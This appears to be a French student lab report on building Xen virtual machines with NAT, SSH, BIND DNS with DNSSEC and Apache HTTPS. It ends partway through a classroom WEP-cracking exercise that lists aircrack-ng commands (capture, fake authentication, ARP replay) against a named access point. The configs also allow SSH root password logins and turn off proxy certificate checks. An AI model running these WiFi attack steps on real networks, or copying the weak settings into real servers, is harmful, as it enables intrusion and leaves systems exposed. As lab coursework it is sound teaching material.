&amp;lt;span id=&amp;quot;création-des-machines-virtuelles&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
== Création des machines virtuelles ==&lt;br /&gt;
&lt;br /&gt;
Les machines virtuelles ont été créées sur l’hyperviseur Xen du Dom0 &amp;lt;code&amp;gt;capbreton.plil.info&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;commandes-de-création&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Commandes de création ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Création de la machine de services SE4.Moon&lt;br /&gt;
root@capbreton:~# xen-create-image --hostname=SE4.Moon --dhcp \&lt;br /&gt;
  --bridge=pontKS --dir=/usr/local/xen --size=10GB \&lt;br /&gt;
  --dist=daedalus --memory=2048M --force&lt;br /&gt;
&lt;br /&gt;
# Création de la machine mandataire SE4.Solstice&lt;br /&gt;
root@capbreton:~# xen-create-image --hostname=SE4.Solstice --dhcp \&lt;br /&gt;
  --bridge=pontKS --dir=/usr/local/xen --size=10GB \&lt;br /&gt;
  --dist=daedalus --memory=2048M --force&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;démarrage-et-connexion&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Démarrage et connexion ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Démarrage des VMs&lt;br /&gt;
xen create /etc/xen/SE4.Moon.cfg&lt;br /&gt;
xen create /etc/xen/SE4.Solstice.cfg&lt;br /&gt;
&lt;br /&gt;
# Connexion aux consoles&lt;br /&gt;
xen console SE4.Moon&lt;br /&gt;
xen console SE4.Solstice&lt;br /&gt;
&lt;br /&gt;
# Liste des VMs actives&lt;br /&gt;
root@capbreton:~# xen list&lt;br /&gt;
Name                                        ID   Mem VCPUs    State   Time(s)&lt;br /&gt;
SE4.Solstice                                39  2048     1     -b----    2560.1&lt;br /&gt;
SE4.Moon                                   119  2048     1     -b----     452.3&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-de-la-machine-de-services-se4.moon&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
== Configuration de la machine de services (SE4.Moon) ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;montage-des-partitions-lvm-pour-var-et-home&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Montage des partitions LVM pour /var et /home ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Création des fichiers de partition sur le Dom0&lt;br /&gt;
root@capbreton:/dev/virtual# lvcreate -L 10G -n SE4.Moon.var virtual&lt;br /&gt;
root@capbreton:/dev/virtual# lvcreate -L 10G -n SE4.Moon.home virtual&lt;br /&gt;
&lt;br /&gt;
# Modification du fichier de configuration Xen&lt;br /&gt;
disk = [&lt;br /&gt;
    'file:/usr/local/xen/domains/SE4.Moon/disk.img,xvda2,w',&lt;br /&gt;
    'file:/usr/local/xen/domains/SE4.Moon/swap.img,xvda1,w',&lt;br /&gt;
    'phy:/dev/virtual/SE4.Moon.home,xvdb,w',&lt;br /&gt;
    'phy:/dev/virtual/SE4.Moon.var,xvdc,w',&lt;br /&gt;
]&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;formatage-et-montage-des-partitions&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Formatage et montage des partitions ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Formatage des partitions&lt;br /&gt;
mkfs -t ext4 /dev/xvdb&lt;br /&gt;
mkfs -t ext4 /dev/xvdc&lt;br /&gt;
&lt;br /&gt;
# Montage temporaire et copie des données&lt;br /&gt;
mount /dev/xvdc /mnt&lt;br /&gt;
mv /var/* /mnt/&lt;br /&gt;
umount /mnt&lt;br /&gt;
&lt;br /&gt;
mount /dev/xvdb /mnt&lt;br /&gt;
mv /home/* /mnt/&lt;br /&gt;
umount /mnt&lt;br /&gt;
&lt;br /&gt;
# Configuration du fstab&lt;br /&gt;
cat &amp;gt; /etc/fstab &amp;lt;&amp;lt; EOF&lt;br /&gt;
/dev/xvda1 none swap sw 0 0&lt;br /&gt;
/dev/xvda2 / ext4 noatime,nodiratime,errors=remount-ro 0 1&lt;br /&gt;
/dev/xvdb /home ext4 defaults 0 2&lt;br /&gt;
/dev/xvdc /var ext4 defaults 0 2&lt;br /&gt;
EOF&lt;br /&gt;
&lt;br /&gt;
# Application des modifications&lt;br /&gt;
mount -a&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-réseau&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Configuration réseau ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Fichier /etc/network/interfaces&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
# Interface réseau privée (vers Solstice)&lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
    address 192.168.20.2/24&lt;br /&gt;
    gateway 192.168.20.1&lt;br /&gt;
&lt;br /&gt;
# Configuration IPv6 automatique&lt;br /&gt;
iface eth0 inet6 auto&lt;br /&gt;
&lt;br /&gt;
# Vérification&lt;br /&gt;
root@Moon:~# ip a show eth0&lt;br /&gt;
2: eth0: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast state UP&lt;br /&gt;
    inet 192.168.20.2/24 brd 192.168.20.255 scope global eth0&lt;br /&gt;
    inet6 2001:660:4401:60a0:216:3eff:fe6f:f547/64 scope global dynamic&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;installation-des-paquets-de-base&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Installation des paquets de base ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;apt update &amp;amp;&amp;amp; apt upgrade -y&lt;br /&gt;
apt install -y ssh apache2 bind9 bind9utils \&lt;br /&gt;
  fail2ban openssl iptables-persistent \&lt;br /&gt;
  net-tools curl wget vim&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-de-la-machine-mandataire-se4.solstice&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
== Configuration de la machine mandataire (SE4.Solstice) ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-réseau-1&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Configuration réseau ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Fichier /etc/network/interfaces&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
# Interface publique (réseau routé)&lt;br /&gt;
auto eth1&lt;br /&gt;
iface eth1 inet static&lt;br /&gt;
    address 193.48.57.167/27&lt;br /&gt;
    gateway 193.48.57.162  # Adresse VRRP virtuelle&lt;br /&gt;
&lt;br /&gt;
iface eth1 inet6 auto&lt;br /&gt;
&lt;br /&gt;
# Interface privée (vers Moon)&lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
    address 192.168.20.1/24&lt;br /&gt;
&lt;br /&gt;
iface eth0 inet6 auto&lt;br /&gt;
&lt;br /&gt;
# Vérification&lt;br /&gt;
root@Solstice:~# ip a show eth1&lt;br /&gt;
3: eth1: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast state UP&lt;br /&gt;
    inet 193.48.57.167/27 brd 193.48.57.191 scope global eth1&lt;br /&gt;
    inet6 2001:660:4401:60a0:216:3eff:fe29:880f/64 scope global dynamic&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;mise-en-place-de-la-mascarade-nat&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Mise en place de la mascarade (NAT) ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Activation du forwarding IP&lt;br /&gt;
echo &amp;quot;net.ipv4.ip_forward=1&amp;quot; &amp;gt;&amp;gt; /etc/sysctl.conf&lt;br /&gt;
sysctl -p&lt;br /&gt;
&lt;br /&gt;
# Règles iptables pour la mascarade&lt;br /&gt;
iptables -t nat -A POSTROUTING -s 192.168.20.0/24 -o eth1 -j MASQUERADE&lt;br /&gt;
iptables -A FORWARD -i eth0 -o eth1 -j ACCEPT&lt;br /&gt;
iptables -A FORWARD -i eth1 -o eth0 -m state --state RELATED,ESTABLISHED -j ACCEPT&lt;br /&gt;
&lt;br /&gt;
# Sauvegarde pour persistance&lt;br /&gt;
iptables-save &amp;gt; /etc/iptables/rules.v4&lt;br /&gt;
&lt;br /&gt;
# Ajout dans interfaces pour chargement au démarrage&lt;br /&gt;
post-up iptables-restore &amp;lt; /etc/iptables/rules.v4&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;services-internet&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
= Services Internet =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;serveur-ssh&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
== Serveur SSH ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-ssh-sur-moon&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Configuration SSH sur Moon ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Édition du fichier de configuration&lt;br /&gt;
vim /etc/ssh/sshd_config&lt;br /&gt;
&lt;br /&gt;
# Modifications apportées :&lt;br /&gt;
PermitRootLogin yes&lt;br /&gt;
PasswordAuthentication yes&lt;br /&gt;
Port 22&lt;br /&gt;
# LogLevel VERBOSE&lt;br /&gt;
&lt;br /&gt;
# Redémarrage du service&lt;br /&gt;
systemctl restart ssh&lt;br /&gt;
systemctl enable ssh&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;redirection-de-ports-pour-laccès-ipv4&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Redirection de ports pour l’accès IPv4 ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Redirection du port 2201 vers Moon (SSH)&lt;br /&gt;
iptables -t nat -A PREROUTING -i eth1 -p tcp --dport 2201 \&lt;br /&gt;
  -j DNAT --to-destination 192.168.20.2:22&lt;br /&gt;
&lt;br /&gt;
iptables -A FORWARD -p tcp -d 192.168.20.2 --dport 22 -j ACCEPT&lt;br /&gt;
&lt;br /&gt;
# Sauvegarde&lt;br /&gt;
iptables-save &amp;gt; /etc/iptables/rules.v4&lt;br /&gt;
&lt;br /&gt;
# Test de la redirection&lt;br /&gt;
ssh -p 2201 root@193.48.57.167  # Arrive sur Moon&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;serveur-dns&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
== Serveur DNS ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-du-serveur-maître-moon&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Configuration du serveur maître (Moon) ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Fichier /etc/bind/named.conf.local&lt;br /&gt;
zone &amp;quot;msalhi.online&amp;quot; {&lt;br /&gt;
    type master;&lt;br /&gt;
    file &amp;quot;/etc/bind/zones/db.msalhi.online&amp;quot;;&lt;br /&gt;
    key-directory &amp;quot;/etc/bind/keys&amp;quot;;&lt;br /&gt;
    dnssec-policy &amp;quot;default&amp;quot;;&lt;br /&gt;
    inline-signing yes;&lt;br /&gt;
    allow-transfer { &lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fe29:880f;&lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fe47:bbe7;&lt;br /&gt;
	2001:660:4401:60a0:216:3eff:fed6:4bc3;&lt;br /&gt;
    };&lt;br /&gt;
    also-notify { &lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fe29:880f;&lt;br /&gt;
	2001:660:4401:60a0:216:3eff:fed6:4bc3;&lt;br /&gt;
    };&lt;br /&gt;
    notify yes;&lt;br /&gt;
};&lt;br /&gt;
&lt;br /&gt;
# Fichier de zone /etc/bind/zones/db.msalhi.online&lt;br /&gt;
$TTL 86400&lt;br /&gt;
@   IN  SOA ns1.msalhi.online. admin.msalhi.online. (&lt;br /&gt;
        2026020320  ; Serial INCRÉMENTÉ et corrigé&lt;br /&gt;
        3600        ; Refresh&lt;br /&gt;
        1800        ; Retry&lt;br /&gt;
        604800      ; Expire&lt;br /&gt;
        86400       ; Minimum TTL&lt;br /&gt;
    )&lt;br /&gt;
&lt;br /&gt;
; Serveurs de noms&lt;br /&gt;
@       IN  NS  ns1.msalhi.online.&lt;br /&gt;
@       IN  NS  ns1.merteuil.tech.&lt;br /&gt;
&lt;br /&gt;
; Enregistrements&lt;br /&gt;
@       IN  A       193.48.57.167&lt;br /&gt;
@       IN  AAAA    2001:660:4401:60a0:216:3eff:fe6f:f548&lt;br /&gt;
ns1     IN  A       193.48.57.167&lt;br /&gt;
ns1     IN  AAAA    2001:660:4401:60a0:216:3eff:fe6f:f548&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
www     IN  CNAME   msalhi.online.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
# Vérification&lt;br /&gt;
named-checkzone msalhi.online /etc/bind/zones/db.msalhi.online&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-du-serveur-secondaire-solstice&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Configuration du serveur secondaire (Solstice) ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Fichier /etc/bind/named.conf.local&lt;br /&gt;
zone &amp;quot;msalhi.online&amp;quot; {&lt;br /&gt;
    type master;&lt;br /&gt;
    file &amp;quot;/etc/bind/zones/db.msalhi.online&amp;quot;;&lt;br /&gt;
    key-directory &amp;quot;/etc/bind/keys&amp;quot;;&lt;br /&gt;
    dnssec-policy &amp;quot;default&amp;quot;;&lt;br /&gt;
    inline-signing yes;&lt;br /&gt;
    allow-transfer { &lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fe29:880f;&lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fe47:bbe7;&lt;br /&gt;
	2001:660:4401:60a0:216:3eff:fed6:4bc3;&lt;br /&gt;
    };&lt;br /&gt;
    also-notify { &lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fe29:880f;&lt;br /&gt;
	2001:660:4401:60a0:216:3eff:fed6:4bc3;&lt;br /&gt;
    };&lt;br /&gt;
    notify yes;&lt;br /&gt;
};&lt;br /&gt;
&lt;br /&gt;
# Redémarrage et vérification&lt;br /&gt;
systemctl restart bind9&lt;br /&gt;
ls -la /var/lib/bind/db.msalhi.online&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-chez-le-registrar-gandi&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Configuration chez le registrar Gandi ===&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|+ Configuration DNS chez Gandi&lt;br /&gt;
|-&lt;br /&gt;
! style=&amp;quot;text-align: left;&amp;quot;| '''Type'''&lt;br /&gt;
! style=&amp;quot;text-align: left;&amp;quot;| '''Valeur'''&lt;br /&gt;
! style=&amp;quot;text-align: left;&amp;quot;| '''Description'''&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| Nameservers&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| ns1.msalhi.online&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| Serveur DNS primaire&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;|&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| ns1.merteuil.tech&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| Serveur DNS secondaire&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| Glue Record 1&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| ns1.msalhi.online&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| IPv6: 2001:660:4401:60a0:216:3eff:fe47:bbe7&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| Glue Record 2&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| ns2.msalhi.online&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| IPv4: 193.48.57.167&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;sécurisation-de-site-web-par-certificat&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
== Sécurisation de site Web par certificat ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;génération-du-csr-et-obtention-du-certificat&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Génération du CSR et obtention du certificat ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Génération de la clé privée&lt;br /&gt;
openssl genrsa -out /etc/ssl/private/myserver.key 2048&lt;br /&gt;
&lt;br /&gt;
# Génération du CSR&lt;br /&gt;
openssl req -new -key /etc/ssl/private/myserver.key \&lt;br /&gt;
  -out /etc/ssl/private/server.csr&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-apache-sur-moon-https-direct-ipv6&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Configuration Apache sur Moon (HTTPS direct IPv6) ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Fichier /etc/apache2/sites-available/msalhi-ssl.conf&lt;br /&gt;
&amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
    ServerName msalhi.online&lt;br /&gt;
    ServerAlias www.msalhi.online&lt;br /&gt;
    Redirect permanent / https://msalhi.online/&lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
    ServerName msalhi.online&lt;br /&gt;
    ServerAlias www.msalhi.online&lt;br /&gt;
    &lt;br /&gt;
    DocumentRoot /var/www/html&lt;br /&gt;
    &lt;br /&gt;
    SSLEngine on&lt;br /&gt;
    SSLCertificateFile /etc/ssl/msalhi/msalhi.online.crt&lt;br /&gt;
    SSLCertificateKeyFile /etc/ssl/msalhi/msalhi.online.key&lt;br /&gt;
    SSLCertificateChainFile /etc/ssl/msalhi/GandiStandardSSLCA2.pem&lt;br /&gt;
    &lt;br /&gt;
    Header always set Strict-Transport-Security &amp;quot;max-age=63072000; includeSubDomains&amp;quot;&lt;br /&gt;
    Header always set X-Frame-Options DENY&lt;br /&gt;
    Header always set X-Content-Type-Options nosniff&lt;br /&gt;
    &lt;br /&gt;
    ErrorLog ${APACHE_LOG_DIR}/msalhi_ssl_error.log&lt;br /&gt;
    CustomLog ${APACHE_LOG_DIR}/msalhi_ssl_access.log combined&lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
# Activation&lt;br /&gt;
a2enmod ssl&lt;br /&gt;
a2ensite msalhi-ssl.conf&lt;br /&gt;
systemctl restart apache2&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-du-proxy-inverse-sur-solstice-https-ipv4&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Configuration du proxy inverse sur Solstice (HTTPS IPv4) ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Fichier /etc/apache2/sites-available/msalhi-proxy.conf&lt;br /&gt;
&amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
    ServerName msalhi.online&lt;br /&gt;
    Redirect permanent / https://msalhi.online/&lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
    ServerName msalhi.online&lt;br /&gt;
    &lt;br /&gt;
    SSLEngine on&lt;br /&gt;
    SSLCertificateFile /etc/ssl/msalhi/msalhi.online.crt&lt;br /&gt;
    SSLCertificateKeyFile /etc/ssl/msalhi/msalhi.online.key&lt;br /&gt;
    SSLCertificateChainFile /etc/ssl/msalhi/GandiStandardSSLCA2.pem&lt;br /&gt;
    &lt;br /&gt;
    SSLProxyEngine on&lt;br /&gt;
    ProxyPreserveHost On&lt;br /&gt;
    &lt;br /&gt;
    # Utilisation de l'URL avec nom de domaine comme demandé&lt;br /&gt;
    ProxyPass / https://msalhi.online/&lt;br /&gt;
    ProxyPassReverse / https://msalhi.online/&lt;br /&gt;
    &lt;br /&gt;
    SSLProxyVerify none&lt;br /&gt;
    SSLProxyCheckPeerCN off&lt;br /&gt;
    &lt;br /&gt;
    ErrorLog ${APACHE_LOG_DIR}/proxy_error.log&lt;br /&gt;
    CustomLog ${APACHE_LOG_DIR}/proxy_access.log combined&lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
# Activation des modules&lt;br /&gt;
a2enmod proxy proxy_http ssl&lt;br /&gt;
a2ensite msalhi-proxy.conf&lt;br /&gt;
systemctl restart apache2&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;sécurisation-de-serveur-dns-par-dnssec&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
== Sécurisation de serveur DNS par DNSSEC ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-dnssec-automatique&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Configuration DNSSEC automatique ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Création du répertoire pour les clés&lt;br /&gt;
mkdir -p /etc/bind/keys&lt;br /&gt;
chown bind:bind /etc/bind/keys&lt;br /&gt;
&lt;br /&gt;
# Ajout dans named.conf.local&lt;br /&gt;
zone &amp;quot;msalhi.online&amp;quot; {&lt;br /&gt;
    type master;&lt;br /&gt;
    file &amp;quot;/etc/bind/zones/db.msalhi.online&amp;quot;;&lt;br /&gt;
    key-directory &amp;quot;/etc/bind/keys&amp;quot;;&lt;br /&gt;
    dnssec-policy &amp;quot;dnspol&amp;quot;;&lt;br /&gt;
    inline-signing yes;&lt;br /&gt;
};&lt;br /&gt;
&lt;br /&gt;
# Politique DNSSEC dans named.conf.options&lt;br /&gt;
dnssec-policy &amp;quot;dnspol&amp;quot; {&lt;br /&gt;
    keys {&lt;br /&gt;
        ksk key-directory lifetime unlimited algorithm 13;&lt;br /&gt;
        zsk key-directory lifetime unlimited algorithm 13;&lt;br /&gt;
    };&lt;br /&gt;
    nsec3param;&lt;br /&gt;
};&lt;br /&gt;
&lt;br /&gt;
# Redémarrage et vérification&lt;br /&gt;
systemctl restart bind9&lt;br /&gt;
dig @localhost msalhi.online DNSKEY +dnssec&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;résultat-des-clés-dnssec-générées&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Résultat des clés DNSSEC générées ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;; Clés obtenues via : dig @localhost msalhi.online DNSKEY +dnssec&lt;br /&gt;
&lt;br /&gt;
msalhi.online.        3600    IN  DNSKEY  256 3 13 Mi9LJ2JnnUciYfGEXoDuZ0ElzOigo+Fjxhf2I1+zxZqcn7SN1FxxGfFJ v4xNsU/YTvGgzf7ZWgWa29b+OQOSug==&lt;br /&gt;
msalhi.online.        3600    IN  DNSKEY  257 3 13 QrPmyYhhAVx1TGYLWRtAx/LbhQPy3yMd5/GoMH5SZ4aWD72QGVrfBOhh HW0/c1dYroeZ9riJTyQcO859svIWRw==&lt;br /&gt;
msalhi.online.        3600    IN  DNSKEY  257 3 13 Z4LE6oWmFPOb+QzklArdW7HWkH6kVrjIgrKYrJBMW3n6sMwwEG1YruHe SvmXJ9GwuFxhqtRu130iPse3wrJqyQ==&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;enregistrement-de-la-ksk-chez-gandi&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Enregistrement de la KSK chez Gandi ===&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|+ Configuration DNSSEC chez Gandi&lt;br /&gt;
|-&lt;br /&gt;
! style=&amp;quot;text-align: left;&amp;quot;| '''Paramètre'''&lt;br /&gt;
! style=&amp;quot;text-align: left;&amp;quot;| '''Valeur'''&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| Algorithm&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| 13 (ECDSAP256SHA256)&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| Flags&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| 257 (KSK)&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| Public Key&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| QrPmyYhhAVx1TGYLWRtAx/LbhQPy3yMd5/GoMH5SZ4aWD72QGVrfBOhhHW0/c1dYroeZ9riJTyQcO859svIWRw==&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Effraction WiFi =&lt;br /&gt;
&lt;br /&gt;
== Cassage de clef WEP d’un point d’accès WiFi ==&lt;br /&gt;
Le réseau cible était &amp;lt;code&amp;gt;cracotte01&amp;lt;/code&amp;gt; (BSSID &amp;lt;code&amp;gt;04:DA:D2:9C:50:50&amp;lt;/code&amp;gt;, canal 4). La procédure a été réalisée depuis la machine &amp;lt;code&amp;gt;zabeth13&amp;lt;/code&amp;gt; avec les outils &amp;lt;code&amp;gt;aircrack-ng&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;ol&amp;gt;&lt;br /&gt;
  &amp;lt;li&amp;gt;Passage de la carte en mode monitor :&lt;br /&gt;
    &amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;sudo airmon-ng start wlan0&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
  &amp;lt;/li&amp;gt;&lt;br /&gt;
  &amp;lt;li&amp;gt;Capture ciblée :&lt;br /&gt;
    &amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;sudo airodump-ng -c 4 --bssid 04:DA:D2:9C:50:50 -w capture_wep wlan0mon&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
  &amp;lt;/li&amp;gt;&lt;br /&gt;
  &amp;lt;li&amp;gt;Authentification fake (association au point d’accès) :&lt;br /&gt;
    &amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;sudo aireplay-ng -1 6000 -o 1 -q 10 -e cracotte01 -a 04:DA:D2:9C:50:50 -h a0:b3:39:5a:dc:c8 wlan0mon&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
  &amp;lt;/li&amp;gt;&lt;br /&gt;
  &amp;lt;li&amp;gt;Attaque ARP replay pour générer du trafic :&lt;br /&gt;
    &amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;sudo aireplay-ng -3 -b 04:DA:D2:9C:50:50 -h a0:b3:39:5a:dc:c8 wlan0mon&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
  &amp;lt;/li&amp;gt;&lt;br /&gt;
  &amp;lt;li&amp;gt;Après accumulation d’environ 40 000 IVs, lancement de aircrack‑ng :&lt;br /&gt;
